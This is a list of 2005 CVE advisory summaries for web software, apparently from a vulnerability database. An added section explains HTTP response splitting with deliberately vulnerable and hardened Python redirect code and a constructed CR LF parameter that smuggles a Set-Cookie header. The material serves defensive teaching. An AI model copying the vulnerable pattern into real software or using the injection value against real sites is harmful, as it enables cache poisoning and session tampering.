[CVE-2005-2276] Cross-site scripting (XSS) vulnerability in Novell Groupwise WebAccess 6.5 before July 11, 2005 allows remote attackers to inject arbitrary web script or HTML via an e-mail message with an encoded javascript URI (e.g. "jAvascript") in an IMG tag.
[CVE-2005-2274] Microsoft Internet Explorer 6.0 does not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability."
[CVE-2005-2273] Opera 7.x and 8 before 8.01 does not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability."
[CVE-2005-2272] Safari version 2.0 (412) does not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability."
[CVE-2005-2271] iCab 2.9.8 does not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability."
[CVE-2005-2268] Firefox before 1.0.5 and Mozilla before 1.7.9 do not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability."
[CVE-2005-2266] Firefox before 1.0.5 and Mozilla before 1.7.9 allow a child frame to call top.focus and other methods in a parent frame, even when the parent is in a different domain, which violates the same origin policy and allows remote attackers to steal sensitive information such as cookies and passwords from web sites whose child frames do not verify that they are in the same domain as their parents.
[CVE-2005-2260] The browser user interface in Firefox before 1.0.5, Mozilla before 1.7.9, and Netscape 8.0.2 and 7.2 does not properly distinguish between user-generated events and untrusted synthetic events, which makes it easier for remote attackers to perform dangerous actions that normally could only be performed manually by the user.
[CVE-2005-2254] Multiple cross-site scripting (XSS) vulnerabilities in PhpAuction 2.5 allow remote attackers to inject arbitrary web script or HTML via the lan parameter to (1) index.php or (2) admin/index.php, or (3) the auction_id parameter to profile.php. NOTE: there is evidence that viewnews.php and login.php may not be part of the PhpAuction product, so they are not included in this description.
[CVE-2005-2235] Buffer overflow in the diagTasksWebSM command in IBM AIX 5.1, 5.2 and 5.3, might allow local users to execute arbitrary code via long command line arguments.
[CVE-2005-2229] Blog Torrent 0.92 and earlier stores sensitive files under the web document root in the (1) data or (2) torrents directories with insufficient access control, which allows remote attackers to obtain sensitive information such as account names and password hashes, as demonstrated using data/newusers.
[CVE-2005-2228] Web Wiz Forums 7.9 and 8.0 allows remote attackers to view message titles of a hidden forum.
[CVE-2005-2224] aspnet_wp.exe in Microsoft ASP.NET web services allows remote attackers to cause a denial of service (CPU consumption from infinite loop) via a crafted SOAP message to an RPC/Encoded method.
[CVE-2005-2217] Dansie Shopping Cart stores the vars.dat file under the web root with insufficient access control, which might allow remote attackers to obtain sensitive information such as program variables.
[CVE-2005-2215] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.4.x before 1.4.6 and 1.5 before 1.5beta3 allows remote attackers to inject arbitrary web script or HTML via a parameter in the page move template, a different vulnerability than CVE-2005-1888.
[CVE-2005-2207] Cross-site scripting (XSS) vulnerability in store/login.asp in CartWIZ allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2005-2204] Cross-site scripting (XSS) vulnerability in Computer Associates (CA) eTrust SiteMinder 5.5, when the "CSSChecking" parameter is set to "NO," allows remote attackers to inject arbitrary web script or HTML via the (1) PASSWORD or (2) BUFFER parameters to smpwservicescgi.exe, (3) the TARGET parameter to login.fcc, and possibly other vectors.
[CVE-2005-2202] Cross-site scripting (XSS) vulnerability in the MicroServer Web Server for Xerox WorkCentre Pro Color 2128, 2636, and 3545, version 0.001.04.044 through 0.001.04.504, allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-2201] Unknown vulnerability in the MicroServer Web Server for Xerox WorkCentre Pro Color 2128, 2636, and 3545, version 0.001.04.044 through 0.001.04.504, allows attackers to cause a denial of service or access files via crafted HTTP requests.
[CVE-2005-2200] Multiple unknown vulnerabilities in the MicroServer Web Server for Xerox WorkCentre Pro Color 2128, 2636, and 3545, version 0.001.04.044 through 0.001.04.504, allow attackers to bypass authentication.
[CVE-2005-2199] PHP remote file inclusion vulnerability in inc/functions.inc.php in PPA web photo gallery 0.5.6 allows remote attackers to execute arbitrary code via the config[ppa_root_path] variable.
[CVE-2005-2191] Multiple cross-site scripting (XSS) vulnerabilities in Comersus shopping cart allow remote attackers to inject arbitrary web script or HTML via the (1) name parameter to comersus_backoffice_listAssignedPricesToCustomer.asp or (2) message parameter to comersus_backoffice_message.asp.
[CVE-2005-2189] Lantronix SecureLinx console server running firmware 2.0 and 3.0 stores /etc/ssh under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as SSH private keys.
[CVE-2005-2186] Multiple cross-site scripting (XSS) vulnerabilities in McAfee IntruShield Security Management System allow remote authenticated users to inject arbitrary web script or HTML via the (1) thirdMenuName or (2) resourceName parameter to SystemEvent.jsp.
[CVE-2005-2176] Novell NetMail automatically processes HTML in an attachment without prompting the user to save or open it, which makes it easier for remote attackers to conduct web-based attacks and steal cookies.
[CVE-2005-2167] Cross-site scripting (XSS) vulnerability in index.php in Plague News System 0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the cid parameter.
[CVE-2005-2163] Cross-site scripting (XSS) vulnerability in index.php in AutoIndex PHP Script 1.5.2 allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2005-2161] Cross-site scripting (XSS) vulnerability in phpBB 2.0.16 allows remote attackers to inject arbitrary web script or HTML via nested [url] tags.
[CVE-2005-2143] Microsoft Front Page allows attackers to cause a denial of service (crash) via a crafted style tag in a web page.
[CVE-2005-2138] Cross-site scripting (XSS) vulnerability in index.php in Comdev eCommerce 3.0 and 3.1 allows remote attackers to inject arbitrary web script or HTML via Javascript in the onMouseOver event of an "A" tag in a review message.
[CVE-2005-2135] SQL injection vulnerability in verify.asp in EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0 allows remote attackers to execute arbitrary SQL commands via the (1) T1 or (2) T2 parameters.
[CVE-2005-2127] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not intended for use within Internet Explorer, as originally demonstrated using the (1) DDS Library Shape Control (Msdds.dll) COM object, and other objects including (2) Blnmgrps.dll, (3) Ciodm.dll, (4) Comsvcs.dll, (5) Danim.dll, (6) Htmlmarq.ocx, (7) Mdt2dd.dll (as demonstrated using a heap corruption attack with uninitialized memory), (8) Mdt2qd.dll, (9) Mpg4ds32.ax, (10) Msadds32.ax, (11) Msb1esen.dll, (12) Msb1fren.dll, (13) Msb1geen.dll, (14) Msdtctm.dll, (15) Mshtml.dll, (16) Msoeacct.dll, (17) Msosvfbr.dll, (18) Mswcrun.dll, (19) Netshell.dll, (20) Ole2disp.dll, (21) Outllib.dll, (22) Psisdecd.dll, (23) Qdvd.dll, (24) Repodbc.dll, (25) Shdocvw.dll, (26) Shell32.dll, (27) Soa.dll, (28) Srchui.dll, (29) Stobject.dll, (30) Vdt70.dll, (31) Vmhelper.dll, and (32) Wbemads.dll, aka a variant of the "COM Object Instantiation Memory Corruption vulnerability."
[CVE-2005-2117] Web View in Windows Explorer on Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 does not properly handle certain HTML characters in preview fields, which allows remote user-assisted attackers to execute arbitrary code.
[CVE-2005-2112] Multiple cross-site scripting (XSS) vulnerabilities in XOOPS 2.0.11 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) order parameter to edit.php or (2) cid parameter to comment_edit.php.
[CVE-2005-2111] login.cgi in Community Link Pro Web Editor allows remote attackers to execute arbitrary commands via the file parameter.
[CVE-2005-2107] Multiple cross-site scripting (XSS) vulnerabilities in post.php in WordPress 1.5.1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) p or (2) comment parameter.
[CVE-2005-2094] Sun SunONE web server 6.1 SP1 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes SunONE to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
[CVE-2005-2093] Oracle 9i Application Server (Oracle9iAS) 9.0.2 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Application Server to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
[CVE-2005-2092] BEA Systems WebLogic 8.1 SP1 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes WebLogic to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
[CVE-2005-2091] IBM WebSphere 5.1 and WebSphere 5.0 allow remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes WebSphere to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
[CVE-2005-2090] Jakarta Tomcat 5.0.19 (Coyote/1.1) and Tomcat 4.1.24 (Coyote/1.0) allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Tomcat to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
[CVE-2005-2089] Microsoft IIS 5.0 and 6.0 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes IIS to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
[CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
[CVE-2005-2087] Internet Explorer 5.01 SP4 up to 6 on various Windows operating systems, including IE 6.0.2900.2180 on Windows XP, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not ActiveX controls, as demonstrated using the JVIEW Profiler (Javaprxy.dll). NOTE: the researcher says that the vendor could not reproduce this problem.
[CVE-2005-2084] Cross-site scripting (XSS) vulnerability in SearchResults.aspx in Community Forum allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2005-2077] Cross-site scripting (XSS) vulnerability in error.asp for Hosting Controller allows remote attackers to inject arbitrary web script or HTML via the error parameter.
[CVE-2005-2075] PHP-Fusion 5.0 and 6.0 stores the database file with a predictable filename under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to the filename in the administration/db_backups directory in PHP-Fusion 6.0 or the fusion_admin/db_backups directory in 5.0.
[CVE-2005-2074] Cross-site scripting (XSS) vulnerability in PHP-Fusion 6.0.105 allows remote attackers to inject arbitrary web script or HTML via a news or article post, possibly involving the (1) news_body, (2) article_description, or (3) article_body parameters to submit.php.
[CVE-2005-2065] HTTP response splitting vulnerability in language_select.asp in ASP Nuke 0.80 allows remote attackers to spoof web content and poison web caches via CRLF ("%0d%0a") sequences in the LangCode parameter.
[CVE-2005-2064] Multiple cross-site scripting vulnerabilities in ASP Nuke 0.80 allow remote attackers to inject arbitrary web script or HTML via the (1) email parameter to forgot_password.asp, or the (2) FirstName, (3) LastName, (4) Username, (5) Password, (6) Address1, (7) Address2, (8) City, (9) ZipCode, (10) Email parameter to register.asp.
[CVE-2005-2063] Multiple cross-site scripting (XSS) vulnerabilities in ActiveBuyAndSell 6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Title parameter to sendpassword.asp or (2) Keyword field in search.asp.
[CVE-2005-2060] Multiple HTTP Response Splitting vulnerabilities in (1) toggleshow.php, (2) togglecats.php, and (3) showprofile.php in Infopop UBB.Threads before 6.5.2 Beta allow remote attackers to spoof web content and poison web caches via CRLF ("%0d%0a") sequences in the Cat parameter.
[CVE-2005-2057] Multiple cross-site scripting (XSS) vulnerabilities in Infopop UBB.Threads before 6.5.2 Beta allow remote attackers to inject arbitrary web script or HTML via the (1) Searchpage parameter to dosearch.php, (2) Number, (3) what, or (4) page parameter to newreply.php, (5) Number, (6) Board, or (7) what parameter to showprofile.php, (8) fpart or (9) page parameter to showflat.php, or (10) like parameter to showmembers.php.
[CVE-2005-2055] RealPlayer 8, 10, 10.5 (6.0.12.1040-1069), and Enterprise and RealOne Player v1 and v2 allow a remote malicious web server to create an arbitrary HTML file that executes an RM file via "default settings of earlier Internet Explorer browsers".
[CVE-2005-2051] Buffer overflow in the VERITAS Backup Exec Web Administration Console (BEWAC) 9.0 4367 through 10.0 rev. 5484 allows remote attackers to execute arbitrary code.
[CVE-2005-2044] Multiple cross-site scripting (XSS) vulnerabilities in ATutor 1.4.3 and 1.5 RC 1 allow remote attackers to inject arbitrary web script or HTML via the (1) show_course parameter to browse.php, (2) subject parameter to contact.php, (3) cid parameter to content.php, (4) l parameter to inbox/send_message.php, the (5) search, (6) words, (7) include, (8) find_in, (9) display_as, or (10) search parameter to search.php, the (11) submit, (12) query, or (13) field parameter to tile.php, the (14) us parameter to forum/subscribe_forum.php, or the (15) roles[], (16) status, (17) submit, or (18) reset_filter parameters to directory.php.
[CVE-2005-2042] Cross-site scripting (XSS) vulnerability in ajax-spell before 1.8 allows remote attackers to inject arbitrary web script or HTML via onmouseover or other events in HTML tags.
[CVE-2005-2034] Cross-site scripting (XSS) vulnerability in folderview.asp for BlueCollar iGallery 3.3 allows remote attackers to inject arbitrary web script or HTML via the folder parameter.
[CVE-2005-2029] amaroK Web Frontend 1.3 stores the globals.inc file under the web root without a .php extension and insufficient access control, which allows remote attackers to obtain the database username and password via a direct request to the file.
[CVE-2005-2022] Unknown vulnerability in Webmail in iPlanet Messaging Server 5.2 Patch 1 and Sun ONE Messaging Server 6.2 allows remote attackers to execute arbitrary Javascript, possibly due to a cross-site scripting (XSS) vulnerability.
[CVE-2005-2021] Cross-site scripting (XSS) vulnerability in cPanel 9.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter in the login page.
[CVE-2005-2020] Directory traversal vulnerability in the web server for 3Com Network Supervisor 5.0.2 allows remote attackers to read arbitrary files via ".." sequences in the URL to TCP port 21700.
[CVE-2005-2011] Multiple cross-site scripting (XSS) vulnerabilities in paFAQ 1.0 Beta 4 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the id parameter in a Question action.
[CVE-2005-2010] Cross-site scripting (XSS) vulnerability in trackback.asp in Ublog Reload 1.0.5 allows remote attackers to inject arbitrary web script or HTML via the btitle parameter.
[CVE-2005-2008] Yaws Webserver 1.55 and earlier allows remote attackers to obtain the source code for yaws scripts via a request to a yaw script with a trailing %00 (null).
[CVE-2005-2005] Ultimate PHP Board (UPB) 1.9.6 GOLD and earlier stores the users.dat file under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information on registered users via a direct request to db/users.dat.
[CVE-2005-2004] Multiple cross-site scripting vulnerabilities in Ultimate PHP Board (UPB) 1.9.6 GOLD and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ref parameter to login.php, (2) id or (3) page parameter to viewtopic.php, id parameter to (4) profile.php, (5) newpost.php, (6) email.php, (7) icq.php, or (8) aol.php, (9) t_id parameter to newpost.php, (10) ref parameter to getpass.php, or (11) sText parameter to search.php.
[CVE-2005-1999] Multiple cross-site scripting (XSS) vulnerabilities in pafiledb.php in paFileDB 3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) sortby or (2) filelist parameters to the category action (category.php), or (3) pages parameter in the viewall action (viewall.php).
[CVE-2005-1990] Internet Explorer 5.0, 5.5, and 6.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not ActiveX controls, including (1) devenum.dll, (2) diactfrm.dll, (3) wmm2filt.dll, (4) fsusd.dll, (5) dmdskmgr.dll, (6) browsewm.dll, (7) browseui.dll, (8) shell32.dll, (9) mshtml.dll, (10) inetcfg.dll, (11) infosoft.dll, (12) query.dll, (13) syncui.dll, (14) clbcatex.dll, (15) clbcatq.dll, (16) comsvcs.dll, and (17) msconf.dll, which causes memory corruption, aka "COM Object Instantiation Memory Corruption Vulnerability," a different vulnerability than CVE-2005-2087.
[CVE-2005-1989] Unknown vulnerability in Internet Explorer 5.0, 5.5, and 6.0 allows remote attackers to obtain information and possibly execute code when browsing from a web site to a web folder view using WebDAV, aka "Web Folder Behaviors Cross-Domain Vulnerability".
[CVE-2005-1988] Unknown vulnerability in Internet Explorer 5.0, 5.5, and 6.0 allows remote attackers to execute arbitrary code via a web site or an HTML e-mail containing a crafted JPEG image that causes memory corruption, aka "JPEG Image Rendering Memory Corruption Vulnerability".
[CVE-2005-1975] Multiple cross-site scripting (XSS) vulnerabilities in Annuaire 1Two 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the id parameter to index.php, or the (2) site_id, (3) nom, (4) email, or (5) commentaire parameters in commentaires.php.
[CVE-2005-1973] Java Web Start in Java 2 Platform Standard Edition (J2SE) 5.0 and 5.0 Update 1 allows applications to assign permissions to themselves and gain privileges.
[CVE-2005-1969] Cross-site scripting (XSS) vulnerability in Pragma Systems Telnetserver 6.0 allows remote attackers to inject arbitrary web script or HTML, and hide activities in log files, via a "<!--" (HTML comment) in a session.
[CVE-2005-1968] Cross-site scripting (XSS) vulnerability in ProductCart Ecommerce before 2.7 allows remote attackers to inject arbitrary web script or HTML via the error parameter to techErr.asp.
[CVE-2005-1962] Cross-site scripting (XSS) vulnerability in Cerberus Helpdesk 0.97.3 allows remote attackers to inject arbitrary web script or HTML via the (1) errorcode parameter to index.php or (2) certain fields to clients.php.
[CVE-2005-1961] Unknown vulnerability in ObjectWeb Consortium C-JDBC before 1.3.1 allows local users to bypass intended access restrictions and obtain the cache results from another user.
[CVE-2005-1955] Cross-site scripting (XSS) vulnerability in index.php in singapore 0.9.11 allows remote attackers to inject arbitrary web script or HTML via the gallery parameter.
[CVE-2005-1951] Multiple HTTP Response Splitting vulnerabilities in osCommerce 2.2 Milestone 2 and earlier allow remote attackers to spoof web content and poison web caches via hex-encoded CRLF ("%0d%0a") sequences in the (1) products_id or (2) pid parameter to index.php or (3) goto parameter to banner.php.
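HTTP response splitting, as in the osCommerce entry above, works because a URL-decoded parameter containing CR LF is written into a response header; the decoded CR LF ends that header and whatever follows is read by the client or cache as further headers (or, after a blank line, as a second response). The code below is an added example, not osCommerce code and not part of the vulscan database; the redirect builder, the header parser standing in for a browser or proxy, and the parameter value are all constructed for the illustration.

```python
from urllib.parse import unquote


def build_redirect_vulnerable(goto):
    """Vulnerable: the decoded parameter goes straight into the Location
    header, so a decoded CR LF terminates that header and whatever follows
    is parsed as further headers (or, after a blank line, a second body)."""
    target = unquote(goto)
    return ("HTTP/1.1 302 Found\r\nLocation: " + target + "\r\n\r\n").encode("latin-1")


def build_redirect_hardened(goto):
    """Hardened: refuse any control character in the header value instead of
    trying to strip it; encoding variants (%0d%0a, %0D%0A) all decode to the
    same characters before this check runs."""
    target = unquote(goto)
    if any(ch in target for ch in "\r\n\x00"):
        raise ValueError("control characters in redirect target")
    return ("HTTP/1.1 302 Found\r\nLocation: " + target + "\r\n\r\n").encode("latin-1")


def parse_headers(raw):
    """Minimal header parser standing in for a browser or caching proxy:
    returns the headers it would see as a lower-cased dict."""
    head = raw.partition(b"\r\n\r\n")[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


# Constructed request parameter: a legitimate target with an encoded CR LF and
# a smuggled header appended (an illustration, not a payload from the advisory).
SPLIT_PARAM = "/index.php?pid=1%0d%0aSet-Cookie:%20injected=1"

if __name__ == "__main__":
    print(parse_headers(build_redirect_vulnerable(SPLIT_PARAM)))
```

The vulnerable builder yields a response in which the parser reports both a Location header and an attacker-chosen Set-Cookie header; the hardened builder rejects the value. In real frameworks the equivalent check is usually already inside the header-setting API, which is why writing raw header strings by hand is the pattern to look for in review.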
[CVE-2005-1950] hints.pl in Webhints 1.03 allows remote attackers to execute arbitrary commands via shell metacharacters in the argument.
[CVE-2005-1945] Cross-site scripting (XSS) vulnerability in the convert_highlite_words function in Invision Blog before 1.1.2 Final allows remote attackers to inject arbitrary web script or HTML via double hex encoded highlight data.
[CVE-2005-1936] Unknown vulnerability in the web server for the ESS/ Network Controller for Xerox Document Centre 240 through 555 running System Software 27.18.017 and earlier allows attackers to "gain unauthorized access."
[CVE-2005-1921] Eval injection vulnerability in PEAR XML_RPC 1.3.0 and earlier (aka XML-RPC or xmlrpc) and PHPXMLRPC (aka XML-RPC For PHP or php-xmlrpc) 1.1 and earlier, as used in products such as (1) WordPress, (2) Serendipity, (3) Drupal, (4) egroupware, (5) MailWatch, (6) TikiWiki, (7) phpWebSite, (8) Ampache, and others, allows remote attackers to execute arbitrary PHP code via an XML file, which is not properly sanitized before being used in an eval statement.
[CVE-2005-1910] SQL injection vulnerability in login.asp for WWWeb Concepts Events System 1.0 allows remote attackers to execute arbitrary SQL commands via the password.
[CVE-2005-1909] The web server control panel in 602LAN SUITE 2004 allows remote attackers to make it more difficult for the administrator to read portions of log files via a "</pre><!-" sequence in an HTTP GET request in the logon, possibly due to a cross-site scripting (XSS) vulnerability.
[CVE-2005-1908] Perception LiteWeb allows remote attackers to bypass access controls for files via an extra leading / (slash) or leading \ (backslash) in the URL.
[CVE-2005-1901] Multiple cross-site scripting (XSS) vulnerabilities in Sawmill before 7.1.6 allow remote attackers to inject arbitrary web script or HTML via (1) the username in the Add User window or (2) the license key in the Licensing page.
[CVE-2005-1895] Cross-site scripting (XSS) vulnerability in FlatNuke 2.5.3 allows remote attackers to inject arbitrary web script or HTML via the border or back parameters to (1) help.php or (2) footer.php.
[CVE-2005-1893] FlatNuke 2.5.3 allows remote attackers to obtain sensitive information via invalid parameters to certain scripts, which leaks the web document root in an error message.
[CVE-2005-1892] FlatNuke 2.5.3 allows remote attackers to cause a denial of service or obtain sensitive information via (1) a direct request to foot_news.php, which triggers an infinite loop, or (2) direct requests to unknown scripts, which reveals the web document root in an error message.
[CVE-2005-1888] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.4.5 allows remote attackers to inject arbitrary web script via HTML attributes in page templates.
[CVE-2005-1886] Cross-site scripting (XSS) vulnerability in view.php in YaPiG 0.92b, 0.93u and 0.94u allows remote attackers to inject arbitrary web script or HTML via (1) the phid parameter or (2) unknown parameters when posting a new comment.
[CVE-2005-1877] Cross-site scripting (XSS) vulnerability in view_ticket.php in Lpanel 1.59 and earlier allows remote attackers to inject arbitrary web script or HTML and obtain sensitive information via the pid parameter.
[CVE-2005-1872] Buffer overflow in the administrative console in IBM WebSphere Application Server 5.x, when the global security option is enabled, allows remote attackers to execute arbitrary code.
[CVE-2005-1866] Cross-site scripting (XSS) vulnerability in calendar.php in Calendarix Advanced 1.5 allows remote attackers to inject arbitrary web script or HTML via the year parameter.
[CVE-2005-1838] Multiple cross-site scripting vulnerabilities in castnewPost.asp in Liberum Help Desk 0.97.3 allow remote attackers to inject arbitrary web script or HTML via the (1) Email, (2) Title, or (3) Description fields.
[CVE-2005-1836] NEXTWEB (i)Site allows remote attackers to cause a denial of service (error 500) via a crafted HTTP request, possibly involving wildcard requests for .jsp files.
[CVE-2005-1835] NEXTWEB (i)Site stores databases under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to databases/Users.mdb.
[CVE-2005-1834] SQL injection vulnerability in login.asp in NEXTWEB (i)Site allows remote attackers to execute arbitrary SQL commands and bypass authentication via the password field.
[CVE-2005-1832] Multiple cross-site scripting (XSS) vulnerabilities in MyBulletinBoard (MyBB) 1.00 RC4 and earlier allow remote attackers to execute arbitrary web script or HTML via the (1) forums, (2) version, or (3) limit parameter to misc.php, (4) page or (5) datecut parameter to forumdisplay.php, (6) username, (7) email, or (8) email2 parameter to member.php, (9) page or (10) usersearch parameter to memberlist.php, (11) pid or (12) tid parameter to showthread.php, or (13) tid parameter to printthread.php.
[CVE-2005-1823] Multiple cross-site scripting (XSS) vulnerabilities in Qualiteam X-Cart 4.0.8 allow remote attackers to inject arbitrary web script or HTML via the (1) cat or (2) printable parameter to home.php, (3) productid or (4) mode parameter to product.php, (5) id parameter to error_message.php, (6) section parameter to help.php, (7) mode parameter to orders.php, (8) mode parameter to register.php, (9) mode parameter to search.php, or the (10) gcid or (11) gcindex parameter to giftcert.php.
[CVE-2005-1819] Cross-site scripting (XSS) vulnerability in NikoSoft WebMail before 0.11.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-1814] Stack-based buffer overflow in PicoWebServer 1.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long URL.
[CVE-2005-1811] Cross-site scripting (XSS) vulnerability in usercp.php for MyBulletinBoard (MyBB) allows remote attackers to inject arbitrary web script or HTML via the website field in a user profile.
[CVE-2005-1803] Multiple cross-site scripting (XSS) vulnerabilities in Net Portal Dynamic System (NPDS) 5.0 allow remote attackers to inject arbitrary web script or HTML via the language parameter to (1) admin.php, or (2) powerpack_f.php, (3) the sitename parameter to sdv_infos.php, (4) the categories parameter to faq.php, (5) the lettre parameter to the glossaire module, (6) the title parameter to reviews.php, or (7) the image_subject parameter to reply.php.
[CVE-2005-1800] Cross-site scripting (XSS) vulnerability in Jaws Glossary gadget 0.4 to 0.5.1 allows remote attackers to inject arbitrary web script or HTML via the term parameter in a view or ViewTerm action to index.php.
[CVE-2005-1799] Cross-site scripting (XSS) vulnerability in FreeStyle Wiki 3.5.7 and WikiLite (FSWikiLite) .10 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2005-1796] Format string vulnerability in the curses_msg function in the Ncurses interface (ec_curses.c) for Ettercap before 0.7.3 allows remote attackers to execute arbitrary code.
[CVE-2005-1783] BookReview beta 1.0 allows remote attackers to obtain the path of the web server via certain parameters to search.htm, possibly due to a search[string] parameter with a missing value or an incorrect submit[type] value, which reveals the path in the resulting error message. NOTE: it is not clear whether BookReview is available to the public. If not, then it should not be included in CVE.
[CVE-2005-1782] Multiple cross-site scripting (XSS) vulnerabilities in BookReview beta 1.0 allow remote attackers to inject arbitrary web script or HTML via the node parameter to (1) add_review.htm, (2) suggest_review.htm, (3) suggest_category.htm, (4) add_booklist.htm, or (5) add_url.htm, the isbn parameter to (6) add_review.htm, (7) add_contents.htm, (8) add_classification.htm, the (9) chapters parameter to the add_contents page in index.php (aka add_contents.htm), (10) the user parameter to contact.htm, or (11) the submit[string] parameter to search.htm. NOTE: it is not clear whether BookReview is available to the public. If not, then it should not be included in CVE.
[CVE-2005-1779] SQL injection vulnerability in password.asp in MaxWebPortal 1.35, 1.36, 2.0, and 20050418 Next allows remote attackers to execute arbitrary SQL commands via the memKey parameter.
[CVE-2005-1778] Cross-site scripting (XSS) vulnerability in readpmsg.php in PostNuke 0.750 allows remote attackers to inject arbitrary web script or HTML via the start parameter.
[CVE-2005-1774] WEB-DAV Linux File System (davfs2) 0.2.3 does not properly enforce Unix permissions, which allows local users to write arbitrary files on a davfs2 mounted filesystem.
[CVE-2005-1769] Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.0 through 1.4.4 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in (1) the URL or (2) an e-mail message.
[CVE-2005-1757] Buffer overflow in the Modweb agent for Novell NetMail 3.52 before 3.52C, when renaming folders, may allow attackers to execute arbitrary code.
[CVE-2005-1756] Cross-site scripting (XSS) vulnerability in the ModWeb agent for Novell NetMail 3.52 before 3.52C allows remote attackers to inject arbitrary web script or HTML via calendar display fields.
[CVE-2005-1749] Buffer overflow in BEA WebLogic Server and WebLogic Express 6.1 Service Pack 4 allows remote attackers to cause a denial of service (CPU consumption from thread looping).
[CVE-2005-1748] The embedded LDAP server in BEA WebLogic Server and Express 8.1 through Service Pack 4, and 7.0 through Service Pack 5, allows remote anonymous binds, which may allow remote attackers to view user entries or cause a denial of service.
[CVE-2005-1747] Multiple cross-site scripting (XSS) vulnerabilities in BEA WebLogic Server and Express 8.1 through Service Pack 4, and 7.0 through Service Pack 6, allow remote attackers to inject arbitrary web script or HTML, and possibly gain administrative privileges, via the (1) j_username or (2) j_password parameters in the login page (LoginForm.jsp), (3) parameters to the error page in the Administration Console, (4) unknown vectors in the Server Console while the administrator has an active session to obtain the ADMINCONSOLESESSION cookie, or (5) an alternate vector in the Server Console that does not require an active session but also leaks the username and password.
[CVE-2005-1746] The cluster cookie parsing code in BEA WebLogic Server 7.0 through Service Pack 5 attempts to contact any host or port specified in a cookie, even when it is not in the cluster, which allows remote attackers to cause a denial of service (cluster slowdown) via modified cookies.
[CVE-2005-1745] The UserLogin control in BEA WebLogic Portal 8.1 through Service Pack 3 prints the password to standard output when an incorrect login attempt is made, which could make it easier for attackers to guess the correct password.
[CVE-2005-1744] BEA WebLogic Server and WebLogic Express 7.0 through Service Pack 5 does not log out users when an application is redeployed, which allows those users to continue to access the application without having to log in again, which may be in violation of newly changed security constraints or role mappings.
